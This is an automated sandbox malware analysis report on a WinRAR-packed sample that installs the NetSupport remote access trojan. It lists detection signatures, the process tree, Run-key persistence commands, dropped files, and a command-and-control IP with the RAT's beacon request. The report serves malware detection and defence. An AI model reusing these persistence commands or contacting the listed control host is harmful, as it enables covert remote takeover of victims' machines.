Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Overview

General Information

Sample name:d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
Analysis ID:1580475
MD5:47cfce938a71540a2039aebd5abe0783
SHA1:641d20b31f5b2aba11746d1e533cbe4d4ee9c6ed
SHA256:d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d582b6d0b6f188306954
Tags:exeNetSupportuser-abuse_ch
Infos:

Detection

NetSupport RAT
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Delayed program exit found
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Uses cmd line tools excessively to alter registry or file data
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

Process Tree

  • System is w10x64
  • d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe" MD5: 47CFCE938A71540A2039AEBD5ABE0783)
    • cmd.exe (PID: 7600 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 7656 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7676 cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • bild.exe (PID: 7692 cmdline: C:\Users\Public\Netstat\bild.exe MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • bild.exe (PID: 7904 cmdline: "C:\Users\Public\Netstat\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • bild.exe (PID: 8120 cmdline: "C:\Users\Public\Netstat\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • bild.exe (PID: 7176 cmdline: "C:\Users\Public\Netstat\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Netstat\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\Public\Netstat\bild.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\Public\Netstat\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\Public\Netstat\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\Public\Netstat\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              0000000B.00000002.1989203129.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  0000000A.00000002.1909557431.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    0000000A.00000002.1908011994.00000000004B2000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 28 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      6.2.bild.exe.4b0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        11.2.bild.exe.4b0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          11.0.bild.exe.4b0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            5.2.bild.exe.6f980000.6.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              6.2.bild.exe.6f980000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 30 entries

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Execution from Suspicious Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Netstat\bild.exe, CommandLine: C:\Users\Public\Netstat\bild.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Netstat\bild.exe, NewProcessName: C:\Users\Public\Netstat\bild.exe, OriginalFileName: C:\Users\Public\Netstat\bild.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7600, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Netstat\bild.exe, ProcessId: 7692, ProcessName: bild.exe
                                Sigma detected: New RUN Key Pointing to Suspicious Folder
                                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Netstat\bild.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7656, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
                                Sigma detected: Suspicious Program Location with Network Connections
                                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 45.76.253.210, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Netstat\bild.exe, Initiated: true, ProcessId: 7692, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Netstat\bild.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7656, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
                                Sigma detected: Direct Autorun Keys Modification
                                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7600, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", ProcessId: 7656, ProcessName: reg.exe
                                Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7600, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", ProcessId: 7656, ProcessName: reg.exe
                                Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Netstat\bild.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7676, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Netstat

                                Suricata Signatures

                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-24T17:37:03.193758+010028277451Malware Command and Control Activity Detected192.168.2.44973045.76.253.210443TCP

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Multi AV Scanner detection for dropped file
                                Source: C:\Users\Public\Netstat\bild.exeReversingLabs: Detection: 28%
                                Source: C:\Users\Public\Netstat\remcmdstub.exeReversingLabs: Detection: 13%
                                Multi AV Scanner detection for submitted file
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeReversingLabs: Detection: 57%
                                AI detected suspicious sample
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.7% probability
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,5_2_110AD570
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,6_2_110AD570
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile opened: C:\Users\Public\Netstat\msvcr100.dllJump to behavior
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                Source: Binary string: msvcr100.i386.pdb source: bild.exe, bild.exe, 00000005.00000002.4163625872.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 00000006.00000002.1828393967.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 0000000A.00000002.1909924839.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 0000000B.00000002.1989498636.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: bild.exe, 00000005.00000002.4163937013.000000006F982000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000006.00000002.1828654414.000000006F982000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 0000000A.00000002.1910320123.000000006F982000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 0000000B.00000002.1989707601.000000006F982000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: bild.exe, 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: bild.exe, 00000005.00000002.4161091973.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000005.00000000.1712834967.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000006.00000000.1825297800.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000006.00000002.1826623935.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000A.00000002.1908011994.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000A.00000000.1906094191.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000B.00000000.1987565229.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000B.00000002.1988599605.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: bild.exe, 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: bild.exe, 00000005.00000002.4163812487.000000006CEF5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 00000006.00000002.1828564621.000000006CEF5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 0000000A.00000002.1910207199.000000006CEF5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 0000000B.00000002.1989634737.000000006CEF5000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D7A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00D7A273
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D8A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00D8A537
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,5_2_1102D330
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,5_2_11065890
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,5_2_1106A0A0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,5_2_111266E0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,5_2_1110AFD0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102D330
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,6_2_11065890
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,6_2_1106A0A0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,6_2_111266E0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,6_2_1110AFD0

                                Networking

                                barindex
                                Suricata IDS alerts for network traffic
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49730 -> 45.76.253.210:443
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 104.26.1.231 104.26.1.231
                                Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.253.210
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.253.210
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.253.210
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST http://45.76.253.210/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 45.76.253.210Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 16:37:05 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8f72039419fd425f-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lW7SVSTeGp6OMPZWlwr0EkdKqCkxO1QY2Xx3tzIwjQw9wj7tLvCi2nECvSnMfUIfdQit%2BIjKqFjaT%2BrObcB9Ya5UFQLQZ5UrOriDWvmNuxghySnFhBKpzWUwyWyGKBbDC7Go%2B1Qt6tiUe4aX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1599&rtt_var=799&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 16:37:06 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8f72039d1ee742a0-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IPdTQEZmPl0lBKR8KjJx9PbAboAcYEK7D0bbCWAIEhlIB2fELg1PzGJcs9DUzwzswUJFVFDlO6xK%2B1ubSbS%2BNIjFDfBktvslhfF6N0RWnlYC80AqdmHSVPfal9CXdU5wPQqn7KgQ63D2hQAs"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1786&min_rtt=1786&rtt_var=893&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 